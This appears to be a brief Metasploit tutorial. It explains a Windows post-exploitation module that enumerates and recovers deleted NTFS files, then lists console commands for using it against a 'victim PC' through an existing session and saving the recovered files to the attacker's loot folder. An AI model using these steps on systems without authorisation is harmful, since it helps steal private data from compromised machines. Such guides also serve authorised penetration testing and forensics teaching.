This module lists and tries to recover deleted files from NTFS file systems. Use the FILES option to guide recovery. Leave it empty to enumerate deleted files in the DRIVE. Set FILES to an extension (Ex. "PNG") to recover deleted files with that extension. Or set FILES to a comma-separated list of IDs (from enumeration) to recover those files. Keep in mind that file enumeration and recovery could take a long time; use the TIMEOUT option to abort enumeration or recovery by extension after that time (in seconds).
Run the following commands to list all the drives of the victim PC:
1. Type background
2. Type use post/windows/gather/forensics/enum_drives
msf exploit (enum_drives)>set session 1
msf exploit (enum_drives)>exploit
Run the following commands to recover the deleted data of the victim PC
(I am using E: drive in my case)
Now type use post/windows/gather/forensics/recovery_files
msf exploit (recovery_files)>set session 1
msf exploit (recovery_files)>set drive E:
msf exploit (recovery_files)>exploit
Run the following command to save the deleted data to /root/.msf4/loot
set files ID
(Ex: set files 1073775554)
set files 1073775554
set files 1073788888
Or
set files ID,ID,ID
(Ex: set files 1073775554,1073788888,1073222212)